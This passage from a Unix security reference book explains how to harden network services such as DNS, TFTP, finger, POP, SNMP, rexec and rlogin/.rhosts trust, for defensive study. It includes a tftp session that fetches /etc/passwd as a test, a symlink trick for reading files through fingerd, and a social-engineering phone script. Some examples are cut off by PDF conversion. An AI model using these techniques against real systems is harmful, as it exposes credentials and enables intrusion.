indicating that the computer's IP address is 128.10.19.20. An MX query about the address cs.purdue.edu might return a record<br />

indicating that mail for that address should actually be delivered to the machine arthur.cs.purdue.edu. You can have multiple MX<br />

records for robustness; if the first host is unavailable, the program attempting to deliver your electronic mail will try the second,<br />

and then the third. Of course, a program trying to deliver email would then have to resolve each of the MX hostnames to<br />

determine that computer's IP address.<br />

DNS also makes provision for mapping IP addresses back to hostnames. This reverse translation is accomplished with a special<br />

domain called IN-ADDR.ARPA, which is populated exclusively by PTR records. In this example, attempting to resolve the<br />

address 20.19.10.128. IN-ADDR.ARPA would return a PTR record pointing to the hostname, which is lucan.cs.purdue.edu (the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (12 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

CNAME of www.cs.purdue.edu).<br />

Besides individual hostname resolutions, DNS also provides a system for downloading a copy of the entire database from a<br />

nameserver. This process is called a zone transfer, and it is the process that secondary servers use to obtain a copy of the primary<br />

server's database.<br />

DNS communicates over both UDP and TCP, using the different protocols for different purposes. Because UDP is a quick,<br />

packet-based protocol that allows for limited data transfer, it is used for the actual process of hostname resolution. TCP,<br />

meanwhile, is used for transactions that require large, reliable, and sustained data transfer - that is, zone transfers.<br />

17.3.6.1 DNS zone transfers<br />

Zone transfers can be a security risk, as they potentially give outsiders a complete list of all of an organization's computers<br />

connected to the internal network. Many sites choose to allow UDP DNS packets through their firewalls and routers, but explicitly<br />

block DNS zone transfers originating at external sites. This design is a compromise between safety and usability: it allows<br />

outsiders to determine the IP addresses of each internal computer, but only if the computer's name is already known.<br />

You can block zone transfers with a router that can screen packets, by blocking incoming TCP connections on port 53. Some<br />

versions of the Berkeley-named nameserver allow you to place an xfrnets directive in the /etc/named.boot file. If this option is<br />

specified, zone transfers will only be permitted from the hosts listed on the xfernets line. This option is useful if you wish to allow<br />

zone transfers to a secondary nameserver that is not within your organization, but you don't want to allow zone transfers to anyone<br />

else.<br />

For example, if your site operates a single domain, bigcorp.com, and you have a secondary nameserver at IP address<br />

204.17.199.40, you might have the following /etc/named.boot file:<br />

; BigCorp's /etc/named.boot<br />

;<br />

directory /var/named<br />

;<br />

primary bigcorp.com named.bigcorp<br />

primary 199.17.204.in-addr.arpa named.204.17.199<br />

cache . root.ca<br />

xfrnets 204.17.199.40<br />

17.3.6.2 DNS nameserver attacks<br />

Because many <strong>UNIX</strong> applications use hostnames as the basis of access control lists, an attacker who can gain control of your DNS<br />

nameserver or corrupt its contents can use that to break into your systems.<br />

There are two fundamental ways that an attacker can cause a nameserver to serve incorrect information:<br />

1.<br />

2.<br />

Incorrect information can be fraudulently loaded into your nameserver's cache over the network, as a false reply to a query.<br />

An attacker can change the nameserver's configuration files on the computer where your nameserver resides.<br />

If your nameserver has contact with the outside network, there is a possibility that attackers can exploit a programming bug or a<br />

configuration error to load your nameserver with erroneous information. The best way to protect your nameserver from these<br />

kinds of attacks is to isolate it from the outside network, so that no contact is made. If you have a firewall, you can achieve this<br />

isolation by running two nameservers: one in front of the firewall, and one behind it. The nameserver in front of the firewall<br />

contains only the names and IP addresses of your gate computer; the nameserver behind the firewall contains the names and IP<br />

addresses of all of your internal hosts. If you couple these nameservers with static routing tables, damaging information will not<br />

likely find its way into your nameservers.<br />

To change your configuration files, an attacker must have access to the filesystem of the computer on which the nameserver is<br />

running and be able to modify the files. After the files are modified, the nameserver must be restarted (by sending it a kill -HUP<br />

signal). As the nameserver must run as superuser, an attacker would need to have superuser access on the server machine to carry<br />

out this attack. Unfortunately, by having control of your nameserver, a skillful attacker could use control over the nameserver to<br />

parlay control of a single machine into control of your entire network. Furthermore, if the attacker does not have root but can<br />

modify the nameserver files, then he can simply wait until the nameserver is restarted by somebody else, or until the system<br />

crashes and every program is restarted.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (13 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

You can minimize the possibility of an attacker modifying your nameserver by following these recommendations:<br />

●<br />

●<br />

●<br />

●<br />

Run your nameserver on a special computer that does not have user accounts.<br />

If you must run the nameserver on a computer that is used by ordinary users, make sure that the nameserver's files are all<br />

owned by root and have their protection mode set to 444 or 400 (depending on your site's policy). Any directories that are<br />

used to store nameserver files should be owned by root and have their protection mode set to 755 or 700 (again, depending<br />

on your site's policy). And all parent directories of those directories should be owned by root, mode 755 or 700.<br />

Remember, there are many files that are used by the nameserver. For example, the Berkeley named nameserver (by far the<br />

most common on <strong>UNIX</strong> systems) first looks at the file /etc/named.bootwhen it starts up. This file specifies other files and<br />

other directories that may be located anywhere on your computer. Be sure that all of these files are properly protected.<br />

If you know of a specific site that is attempting to attack your nameserver, you can use BIND's bogusns directive to prevent<br />

the program from sending nameserver queries to that host.<br />

You can further protect yourself from nameserver attacks by using IP addresses in your access control lists, rather than by using<br />

hostnames. Unfortunately, several significant programs do not allow the use of IP addresses. For example, the Solaris rlogind/rshd<br />

does not allow you to specify an IP address in the /etc/hosts.equiv file or the .rhosts file. We believe that vendors should modify<br />

their software to permit an IP address to be specified wherever hostnames are currently allowed.<br />

17.3.7 Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

The Trivial File Transfer Protocol (TFTP) is a UDP-based file-transfer program that provides no security. There is a set of files<br />

that the TFTP program is allowed to transmit from your computer, and the program will transmit them to anybody on the <strong>Internet</strong><br />

who asks for them. One of the main uses of TFTP is to allow workstations to boot over the network; the TFTP protocol is simple<br />

enough to be programmed into a small read-only memory chip.<br />

Because TFTP has no security, tftpd, the TFTP daemon, is normally restricted so that it can transfer files only to or from a certain<br />

directory. Unfortunately, many early versions of tftpd had no such restriction. For example, versions of the SunOS operating<br />

systems prior to Release 4.0 did not restrict file transfer from the TFTP program.<br />

You can test your version of tftpd for this restriction with the following sequence:<br />

% tftp localhost<br />

tftp> get /etc/passwd tmp<br />

Error code 1: File not found<br />

tftp> quit<br />

%<br />

If tftp does not respond with "Error code 1: File not found," or simply hangs with no message, then get a current version of the<br />

program.<br />

On AIX, tftp access can be restricted through the use of the /etc/tftpaccess.ctl file.<br />

17.3.8 finger (TCP Port 79)<br />

The finger program has two uses:<br />

●<br />

●<br />

If you run finger with no arguments, the program prints the username, full name, location, login time, and office telephone<br />

number of every user currently logged into your system (assuming that this information is stored in the /etc/passwd file).<br />

If you run finger with a name argument, the program searches through the /etc/passwd file and prints detailed information<br />

for every user with a first name, last name, or username that matches the name you specified.<br />

Normally, finger runs on the local machine. However, you can find out who is logged onto a remote machine (in this case, a<br />

machine at MIT) by typing:<br />

% finger @media-lab.media.mit.edu<br />

To look up a specific user's finger entry on this machine, you might type:<br />

% finger gandalf@media-lab.media.mit.edu<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (14 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

The /etc/fingerd program implements the network finger protocol, which makes finger service available to anybody on the<br />

network.<br />

finger provides a simple, easy-to-use system for making personal information (like telephone numbers) available to other people.<br />

Novice users are often surprised, however, that information that is available on their local machine is also available to anyone on<br />

any network to which their local machine is connected. Thus, users should be cautioned to think twice about the information they<br />

store using the chfn command, and in their files printed by finger. finger makes it easy for intruders to get a list of the users on<br />

your system, which dramatically increases the intruders' chances of breaking into your system.<br />

17.3.8.1 The .plan and .project files<br />

Most versions of the <strong>UNIX</strong> finger program display the contents of the .plan and .project files in a person's home directory when<br />

that person is "fingered." On older versions of <strong>UNIX</strong>, the finger daemon ran as root. As a result, an intrepid user could read the<br />

contents of any file on the system by making her .plan a symbolic link to that file, and then running finger against her own<br />

account.<br />

One easy way that you can check for this is to create a .plan file and change its file mode to 000. Then run finger against your own<br />

account. If you see the contents of your .plan file, then your version of fingerd is unsecure.<br />

17.3.8.2 Disabling finger<br />

The finger system reveals information that could be used as the basis for a social engineering attack. For example, an attacker<br />

could "finger" a user on the system, determine their name and office number, then call up the system operator and say "Hi, this is<br />

Jack Smith. I work in office E15, but I'm at home today. I've forgotten my password; could you please change my password to<br />

foo*bar so that I can log on?"<br />

Many system administrators choose to disable the finger system. There are two ways that you can do this:<br />

●<br />

●<br />

You can remove (or comment out) the finger server line in the file /etc/inetd.conf. This change will cause people trying to<br />

finger your site to receive a "Connection refused" error. Disabling finger in this way can cause problems for trying to<br />

determine mail addresses or phone numbers. Outsiders may be attempting to contact you to warn you that your site has been<br />

broken into by others. Therefore, completely disabling finger in this way might actually decrease your overall security, in<br />

addition to causing an overall inconvenience for everybody.<br />

You can replace the finger server with a shell script that prints a message instructing people how to contact your site. For<br />

example, you might use a script that looks like this:<br />

#!/bin/sh<br />

#<br />

/bin/cat


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

and specify which information should be returned for queries originating from inside and outside your network.<br />

You can download the ph server from ftp://vixen.cso.uiuc.edu/pub/ph.tar.gz.<br />

17.3.9 HyperText Transfer Protocol (HTTP) (TCP Port 80)<br />

The Hypertext Transfer Protocol is the protocol that is used to request and receive documents from servers on the World Wide<br />

Web (WWW). Access to the World Wide Web is one of the driving forces behind the growth of the <strong>Internet</strong>, and many sites that<br />

have <strong>Internet</strong> connectivity will be pressured to provide both client applications and WWW servers for their users.<br />

One of the reasons for the success of HTTP is its simplicity. When a client contacts a WWW server, the client asks for a filename;<br />

the server responds with a MIME document formatted in either plain ASCII or HTML (HyperText Markup Language). The<br />

document is then displayed.[15]<br />

[15] HTML is a simple use of SGML (Standard Generalized Markup Language).<br />

WWW browsers can implement as much (or as little) of HTML as they wish; the documents displayed will still be viewable.<br />

HTML documents can have embedded tags for images (which are separately retrieved) and for hypertext links to other documents.<br />

The servers are configured so that a specified directory on the system (for example, /usr/local/etc/httpd/htdocs) corresponds with<br />

the root directory of the WWW client (for example, http://www.oreilly.com/).<br />

Because there are many security considerations when setting up a WWW server and using a WWW client, we have written a<br />

whole chapter about them. See Chapter 18, WWW <strong>Sec</strong>urity, for the complete story.<br />

17.3.10 Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

The Post Office Protocol (POP) is a system that provides users on client machines a way to retrieve their electronic mail - without<br />

mounting a shared mail-spool directory using a remote file-access protocol such as NFS. POP allows users to access individual<br />

mail messages, to set limits on the maximum length of the message that the client wishes to retrieve, and to leave mail on the<br />

server until the message has been explicitly deleted.<br />

POP requires that users authenticate themselves before they can access their mail. There are at least three ways to do this:<br />

1.<br />

2.<br />

You can use simple passwords. This is by far the most common way for POP users to authenticate themselves to POP<br />

servers. Unfortunately, most POP clients use the same password for retrieving mail that they do for unrestricted system<br />

access. As a result, the user's password is a tempting target for an attacker armed with a packet sniffer. And it's an easy<br />

target, as it is always sent properly, it is always sent to the same port, and it is sent frequently - typically every few minutes.<br />

You can use POP's APOP option. Instead of passwords, APOP uses a simple challenge/response system. It is described in<br />

RFC 1725, the same RFC that describes POP3.<br />

When a client program connects to a POP3 server, the server sends a banner that must include a unique timestamp string<br />

located within a pair of angle-brackets. For example, the <strong>UNIX</strong> POP server might return the following:<br />

+OK POP3 server ready <br />

When using simple passwords, the client program would next send through the username and the password, like this:<br />

+OK POP3 server ready <br />

user mrose<br />

+OK Password required for mrose.<br />

pass fooby$#<br />

+OK maildrop has 1 message (369 octets)<br />

With APOP, the client program does not send the USER and PASS commands; instead, it sends an APOP command that<br />

contains the username and a 128-bit hexadecimal number that is the MD5 hash code of the timestamp (including the angle<br />

brackets) and a secret passphrase that is known to both the user and the POP server. For example, the user might have the<br />

password tanstaaf. To determine the appropriate MD5 code, the user's client program would compute the MD5 hash of:<br />

tanstaaf<br />

which is:<br />

c4c9334bac560ecc979e58001b3e22fb<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (16 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

3.<br />

Thus, the APOP message sent to the server would be:<br />

APOP mrose c4c9334bac560ecc979e58001b3e22fb<br />

+OK maildrop has 1 message (369 octets)<br />

Note that because the POP3 server must know the shared secret, it should not be the same phrase as your password.<br />

You can use a version of POP that has been modified to work with Kerberos. (Kerberos is described in Chapter 19, RPC,<br />

NIS, NIS+, and Kerberos.)<br />

Note that both your POP server and your POP client must support the authentication system that you wish to use. For example,<br />

early popular Eudora email clients only support traditional passwords, but later versions include support for both APOP and<br />

Kerberos.[16]<br />

[16] Actually, Eudora doesn't support Kerberos directly. Instead, it uses the Kclient application program that is<br />

available for both the Macintosh and Windows.<br />

17.3.11 Sun RPC's portmapper (UDP and TCP Ports 111)<br />

The portmapper program is used as part of Sun Microsystem's Remote Procedure Call (RPC) system to dynamically assign the<br />

TCP and UDP ports used for remote procedure calls. portmapper is thus similar to the inetd daemon, in that it mediates<br />

communications between network clients and network servers that may have security problems.<br />

The standard <strong>UNIX</strong> portmapper assumes that security will be handled by the servers, and therefore allows any network client to<br />

communicate with any RPC server. You can improve security by using Wietse Venema's portmapper replacement program, which<br />

can be obtained via anonymous FTP from the site ftp.win.tue.nl /pub/security/portmap.shar. This portmapper allows for improved<br />

logging, as well as access control lists.<br />

Many sites further restrict access to their portmappers by setting their firewalls to block packets on port 111.<br />

17.3.12 Identification Protocol (auth) (TCP Port 113)<br />

The TCP/IP protocol is a system for creating communication channels between computers, not users. However, it is sometimes<br />

useful to know the name of the user associated with a particular TCP/IP connection. For example, when somebody sends mail to<br />

your computer, you should be able to verify that the username in the mail message's "From:" field is actually the name of the user<br />

who is sending the message.<br />

The identification protocol gives you a way of addressing this problem with a simple callback scheme. When a server wants to<br />

know the "real name" of a person initiating a TCP/IP connection, it simply opens a connection to the client machine's identd<br />

daemon and sends a description of the TCP/IP connection in progress; the remote machine sends a human-readable representation<br />

of the user who is initiating the connection - usually the user's username and the full name from the /etc/passwd file.<br />

The identification protocol is usually not a very good approach to network security, because it depends on the honesty of the<br />

computer at the other end of the TCP/IP connection. Thus, if somebody is trying to break into your computer from another<br />

computer that they have already gained control of, ident will not tell you that person's name. On the other hand, it is useful for<br />

organizations such as universities who want to track down the perpetrators of simplistic, sophomoric email forgery attempts.<br />

If an intruder has a normal account (no root privileges) that he is using as a stepping stone to other hosts, running an ident server<br />

may be very useful in tracking down the intruder. Sites that have a reasonable number of users should run ident to help track down<br />

accounts that have been compromised during an incident.<br />

In general, the responses of ident queries are more useful to the administrators of the site that sends the response than the site that<br />

receives it. Thus, logging ident queries may not help you, but can be a courtesy to others.<br />

To make use of the identification protocol, you need to have a server program that understands the protocol and knows to place<br />

the callback. sendmail version 8 will do so, for instance, as will tcpwrapper.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (17 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

17.3.13 Network News Transport Protocol (NNTP) (TCP Port 119)<br />

The Network News Transport Protocol (NNTP) is used by many large sites to transport Usenet articles between news servers. The<br />

protocol also allows users on distributed workstations to read news and post messages to the Usenet.<br />

NNTP can be configured with an access control list (ACL) to determine which computers are allowed to use which features. The<br />

access control list is based on hostname; thus NNTP's security can be bypassed through IP spoofing or through DNS attacks.<br />

Under normal circumstances, a compromised NNTP server does not represent a serious security threat - it simply means that an<br />

unauthorized individual may be able to read or post Usenet articles without permission. However, there are two potential<br />

circumstances in which unauthorized use of NNTP could cause problems:<br />

●<br />

●<br />

If you have special newsgroups for your own organization's internal discussions, there is a chance that a compromised<br />

NNTP server could reveal confidential information to outsiders.<br />

If an outsider can post from your NNTP server, that outsider could post a message that is libelous, scandalous, or offensive -<br />

potentially causing a liability for your organization.<br />

You can protect your NNTP server from these forms of abuse with a good firewall.<br />

INND is an alternative Usenet news transport program written by Rich Salz. If you are running INND, make sure that you have at<br />

least version 1.4 and have applied the relevant security patches, or have a version higher than 1.4. Versions of INND prior to and<br />

including version 1.4 had a serious problem.[17]<br />

[17] For any software like this that you install, you should check to be sure that you have the most current version.<br />

17.3.14 Network Time Protocol (NTP) (UDP Port 123)<br />

The Network Time Protocol (NTP) is the latest in a long series of protocols designed to let computers on a local or wide area<br />

network figure out the current time. NTP is a sophisticated protocol that can take into account network delay and the existence of<br />

different servers with different clocks. Nevertheless, NTP was not designed to resist attack, and several versions of ntpd, the NTP<br />

daemon, can be fooled into making significant and erroneous changes to the system's clock.<br />

A variety of problems can arise if an attacker can change your system clock:<br />

●<br />

●<br />

●<br />

The attacker can attempt a replay attack. For example, if your system uses Kerberos, old Kerberos tickets may work once<br />

again. If you use a time-based password system, old passwords may work.<br />

Your system log files will no longer accurately indicate the correct time at which events took place. If your attacker can<br />

move the system's clock far into the future, he or she might even be able to cause your system to erase all of its log files as<br />

the result of a weekly or monthly cleanup procedure.<br />

Batch jobs run from the cron daemon may not be executed if your system's clock jumps over the time specified in your<br />

crontab file or directory. This type of failure in your system's clock may have an impact on your security.<br />

17.3.15 Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)<br />

The Simple Network Management Protocol (SNMP) is a protocol designed to allow the remote management of devices on your<br />

network. To be managed with SNMP, a device must be able to receive packets over a network.<br />

SNMP allows for two types of management messages:<br />

●<br />

●<br />

Messages that monitor the current status of the network (for example, the current load of a communications link)<br />

Messages that change the status of network devices (for example, take a communications link up or down)<br />

SNMP can be of great value to attackers. With carefully constructed SNMP messages, an attacker can learn the internal structure<br />

of your network, change your network configuration, and even shut down your operations. Although some SNMP systems include<br />

provisions for password-based security, others don't. SNMP version 2.0 was intended to include better security features, but as this<br />

book goes to press, the standards committee is unable to agree on the necessary features, so the prospects look bleak. Each site<br />

must therefore judge the value of each particular SNMP service and weigh that value against the risk.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (18 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

NOTE: If you use SNMP, you should be sure to change your SNMP "community" from "public" to some other<br />

value. When an SNMP monitoring program queries an SNMP agent for information, the monitoring program must<br />

provide the correct community or the agent does not return any information. By changing your SNMP community<br />

from the default (public) to some other value, you can limit the amount of information that an unknowledgeable<br />

attacker can learn about your network.<br />

17.3.16 NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NEXTSTEP applications (don't laugh; there are still quite a few out there) use TCP connections on port 178 to communicate with<br />

the NEXTSTEP Display PostScript Window Server. An application that can connect to the Window Server has total control of the<br />

workstation on which that Window Server is running: as with X, the application can read the contents of the screen and send<br />

events to other applications. Furthermore, the application can use the Display PostScript Server to read or write any file on the<br />

workstation to which the logged-in user has access.<br />

Current versions of the NEXTSTEP Window Server have a simplistic approach to security. There is no authentication of incoming<br />

connections. The Window Server either accepts connections from remote machines or it doesn't. Whether or not connections are<br />

accepted is set by a check box in the NEXTSTEP Preference application. The preference is stored in the user's "defaults database,"<br />

which means that it can be toggled on by rogue applications without the user's knowledge.<br />

Accept remote connections at your own risk.<br />

If you place a computer running NEXTSTEP on the <strong>Internet</strong>, be sure that you place it behind a firewall, or be absolutely sure that<br />

you do not allow remote applications to connect to your Window Server.<br />

17.3.17 rexec (TCP Port 512)<br />

The remote execution daemon /usr/sbin/rexecd allows users to execute commands on other computers without having to log into<br />

them. The client opens up a connection and transmits a message that specifies the username, the password, and the name of the<br />

command to execute. As rexecd does not use the trusted host mechanism, it can be issued from any host on the network. However,<br />

because rexecd requires that the password be transmitted over the network, it is susceptible to the same password snooping as<br />

Telnet.<br />

Unlike login and telnet, rexecd provides different error messages for invalid usernames and invalid passwords. If the username<br />

that the client program provides is invalid, rexecd returns the error message "Login incorrect." If the username is correct and the<br />

password is wrong, however, rexecd returns the error message "Password incorrect."<br />

Because of this flaw, a cracker can use rexecd to probe your system for the names of valid accounts and then to target those<br />

accounts for password guessing attacks.<br />

If you do not expect to use this service, disable it in /etc/inetd.conf.<br />

17.3.18 rlogin and rsh (TCP Ports 513 and 514)<br />

The rlogin and rlogind programs provide remote terminal service that is similar to telnet. rlogin is the client program, and rlogind<br />

is the server. There are two important differences between rlogin and telnet:<br />

1.<br />

2.<br />

rlogind does not require that the user type his or her username; the username is automatically transmitted at the start of the<br />

connection.<br />

If the connection is coming from a "trusted host" or "trusted user," (described in the next section), the receiving computer<br />

lets the user log in without typing a password.<br />

rsh/rshd are similar to rlogin/rlogind, except that instead of logging the user in, they simply allow the user to run a single<br />

command on the remote system. rsh is the client program, while rshd is the server. rsh/rshd only works from trusted hosts or<br />

trusted users (described in the next section).<br />

rlogin is used both with local area networks and over the <strong>Internet</strong>. Unfortunately, it poses security problems in both environments.<br />

rlogin and rsh are designed for communication only between Berkeley <strong>UNIX</strong> systems. Users who want to communicate between<br />

<strong>UNIX</strong> and TOPS, VMS, or other kinds of systems should use the telnet protocol, not the rlogin protocol.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (19 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

17.3.18.1 Trusted hosts and users<br />

Trusted host is a term that was invented by the people who developed the Berkeley <strong>UNIX</strong> networking software. If one host trusts<br />

another host, then any user who has the same username on both hosts can log in from the trusted host to the other computer<br />

without typing a password.<br />

Trusted users are like trusted hosts, except they are users, not hosts. If you designate a user on another computer as a trusted user<br />

for your account, then that user can log into your account without typing a password.<br />

The <strong>UNIX</strong> system of trusted hosts allows you to use the network to its fullest extent. rlogin lets you easily jump from computer to<br />

computer, and rsh lets you run a command on a remote computer without even having to log in!<br />

Trust has a lot of advantages. In a small, closed environment, computers often trust each other. Trust allows a user to provide a<br />

password once, the first time he logs in, and then to use any other machine in the cluster without having to provide a password a<br />

second time. If one user sometimes uses the network to log into an account at another organization, then that user can set up the<br />

accounts to trust each other, thus speeding up the process of jumping between the two organizations.<br />

But trust is also dangerous, because there are numerous ways that it can be compromised.<br />

NOTE: The trusted-host mechanism uses IP addresses for authentication and is thus vulnerable to IP spoofing (as<br />

well as to DNS attacks). Do not use trusted hosts in security-critical environments.<br />

17.3.18.2 The problem with trusted hosts<br />

Because you don't need to type your password when you use rlogin to log into a computer from another machine that is a trusted<br />

host, rlogin is usually less susceptible to eavesdropping than telnet. However, trusted hosts introduce security problems for two<br />

reasons: you can't always trust a host, and you can't trust the users on that host.<br />

If an attacker manages to break into the account of someone who has an account on two computers - and the two computers trust<br />

each other - then the person's account on the second computer is also compromised. Having an attacker break into the first<br />

computer is easier than it may sound. Most workstations can be booted in single-user mode with relative ease. As the superuser,<br />

the attacker can su to any account at all. If the server trusts the workstation - perhaps to let users execute commands on the server<br />

with rsh - then the attacker can use rlogin to log into the server and thereby gain access to anybody's files.<br />

Although some workstations can be password protected against being booted in single-user mode, this protection gives only an<br />

illusion of security. In theory, an attacker could simply unplug the current workstation and plug in her own. Portable <strong>UNIX</strong><br />

workstations with Ethernet boards are available that weigh less than four pounds. By reconfiguring her portable workstation's<br />

network address and hostname, she could program it to masquerade as any other computer on the local area network.<br />

Another problem with trusted hosts involves NFS. Often, a user's home directory is exported with NFS to other machines.<br />

Someone who is able to write to the user's home directory on that partition on a remote machine can add arbitrary entries to the<br />

.rhosts file. These additions then allow the attacker to log in to that account on every machine that imports the home directory.<br />

Trusted hosts and trusted users have been responsible for many security breaches in recent years. Trust causes breaches in security<br />

to propagate quickly: If charon trusts ringworld and an intruder breaks into ringworld, then charon is also compromised.<br />

Nevertheless, system administrators frequently set up computers as trusted clusters to enable users to take advantage of the<br />

network environment with greater ease. Although there is technically no reason to create these trusted clusters in a networked<br />

computing environment, at many computing facilities administrators believe that the benefits outweigh the risks.<br />

Trusted hosts are also vulnerable to IP spoofing, a technique in which one computer sends out IP packets that appear to come from<br />

a different computer. Using a form of IP spoofing, users on one host can masquerade, and appear to come from a second host.<br />

They can then log into your computer, if the second host is trusted.<br />

17.3.18.3 Setting up trusted hosts<br />

The /etc/hosts.equiv file contains a list of trusted hosts for your computer. Each line of the file lists a different host. If you have<br />

Sun's NIS (or use another system that supports netgroups), you can also extend or remove trust from entire groups of machines.<br />

Any hostname listed in hosts.equiv is considered trusted; a user who connects with rlogin or rsh from that host will be allowed to<br />

log in or execute a command from a local account with the same username, without typing a password. When using Sun's NIS<br />

(described in Chapter 19), a line of the form +@hostgroup makes all of the hosts in the network group hostgroup trusted;<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (20 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

likewise, a line that has the form -@anotherhostgroup makes all of the hosts in the network group anotherhostgroup specifically<br />

not trusted. The file is scanned from the beginning to the end; the scanning stops after the first match.[18]<br />

[18] Beware that +@hostgroup and -@hostgroup features are broken in some NIS implementations. Check to be sure<br />

they are doing what you intend.<br />

Consider this example file:<br />

gold.acs.com<br />

silver.acs.com<br />

platinum.acs.com<br />

-@metals<br />

+@gasses<br />

This file makes your computer trust the computers gold, silver, and platinum in the acs.com domain. Furthermore, your computer<br />

will trust all of the machines in the gasses netgroup, except for the hosts that are also in the metals netgroup.<br />

17.3.18.4 The ~/.rhosts file<br />

After scanning the hosts.equiv file, the rlogind and rshd programs scan the user's home directory for a file called .rhosts. A user's<br />

.rhosts file allows each user to build a set of trusted hosts applicable only to that user.<br />

For example, suppose the ~keith/.rhosts file on the math.harvard.edu computer contains the lines:<br />

prose.cambridge.ma.us<br />

garp.mit.edu<br />

With this .rhosts file, a user name keith on prose or on garp can rlogin into keith's account on math without typing a password.<br />

A user's .rhosts file can also contain hostname-username pairs extending trust to other usernames. For example, suppose that<br />

keith's .rhosts file also contains the line:<br />

hydra.gatech.edu lenny<br />

In this case, the user named lenny at the host hydra could log into keith's account without providing a password.<br />

NOTE: Only place machine names in the /etc/hosts.equiv file; do not place machine /username pairs! Although many<br />

versions of <strong>UNIX</strong> allow you to add usernames to the file, the <strong>UNIX</strong> networking utilities do not do the sensible thing<br />

by extending trust only to that particular user on that particular machine. Instead, they allow that particular user on<br />

that particular machine to log into any account on your system! If you wish to extend trust to a particular user on a<br />

particular machine, have that user create a ~/.rhosts file, described below.<br />

.rhosts files are powerful and dangerous. If a person works at two organizations, using a .rhosts file allows that person to use the<br />

rsh command between the two machines. It also lets you make your account available to your friends without telling them your<br />

password. (We don't recommend this as sound policy, however!) Also, note that the superusers of each organization can make use<br />

of the entries in .rhosts files to gain access to your account in the other organization. This could lead to big problems in some<br />

situations.<br />

The trust implied by the ~/.rhosts file is transitive. If you trust somebody, then you trust everybody that they trust, and so on.<br />

.rhosts files are easily exploited for unintended purposes. For example, crackers who break into computer systems frequently add<br />

their usernames to unsuspecting users' .rhosts files so that they can more easily break into the systems again in the future. For this<br />

reason, you may not want to allow these files on your computer.<br />

NOTE: The ~/.rhosts file should be set up with mode 600 so that other users on your system cannot easily determine<br />

the hosts that you trust. Always use fully qualified domain names in this file, and do not include any comment<br />

characters. (# or ! can create vulnerabilities.) The same restrictions apply to hosts.equiv and hosts.lpd.<br />

17.3.18.5 Searching for .rhosts files<br />

Because of the obvious risks posted by .rhosts files, many system administrators have chosen to disallow them entirely. How do<br />

you do this? One approach is to remove (or comment out) the entries for rshd and rlogind in the inetd.conf file, thus disabling the<br />

commands that might use the files. Another way is to use Wietse Venema's logdaemon package. A third option is to obtain the<br />

source code for the rshd and rlogind programs and remove the feature directly.[19] This method is relatively easy to do. Another<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (21 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

approach is to scan your system periodically for users who have these files and to take appropriate action when you find them.<br />

Finally, you can patch the binary of your rshd and rlogind programs, search for the string /.rhosts, and then change it to the empty<br />

string.<br />

[19] Before you hack the code, try checking your rshd documentation. Some vendors have a flag to limit .rhosts<br />

(usually to just the supervisor).<br />

You can find all of the .rhosts files on your system using a simple shell script:<br />

#!/bin/ksh<br />

# Search for .rhosts files in home directories<br />

PATH=/usr/bin<br />

for user in $(cat-passwd | awk -F: 'length($6) > 0 {print $6}'| sort -u)<br />

do<br />

[[ -f $user/.rhosts ]] && print "There is a .rhosts file in $user"<br />

done<br />

where the cat-passwd command is the same one we described earlier.<br />

To delete the .rhosts files automatically, add a rm command to the shell script after the print:<br />

#!/bin/ksh<br />

# Search for .rhosts files in home directories<br />

PATH=/usr/bin<br />

for user in $(cat-passwd | awk -F: 'length($6) > 0 {print $6}'| sort -u)<br />

do<br />

[[ -f $user/.rhosts ]] || continue<br />

rm -f $user/.rhosts<br />

print "$user/.rhosts has been deleted"<br />

done<br />

NOTE: Many older SunOS systems were distributed with a single line containing only a plus sign (+) as their<br />

hosts.equiv file: The plus sign has the effect of making every host a trusted host, which is precisely the wrong thing to<br />

do. This line is a major security hole, because hosts outside the local organization (over which the system<br />

administrator has no control) should never be trusted. If you have a plus sign in your hosts.equiv file, REMOVE IT.<br />

This change will disable some other features, such as the ability for other machines to print on your printer using the<br />

remote printer system. To retain remote printing, follow the steps detailed later.<br />

17.3.18.6 /etc/hosts.lpd file<br />

Normally, the <strong>UNIX</strong> lpd system allows only trusted hosts to print on your local printer. However, this restriction presents a<br />

security problem, because you may wish to let some computers use your printer without making them equivalent hosts.<br />

The way out of this quandary is to amend the /etc/hosts.lpd file. By placing a hostname in this file, you let that host use your<br />

printers without making it an equivalent host. For example, if you want to let the machines dearth and black use your computer's<br />

printer, you can insert their names in /etc/hosts.lpd:<br />

% cat /etc/hosts.lpd<br />

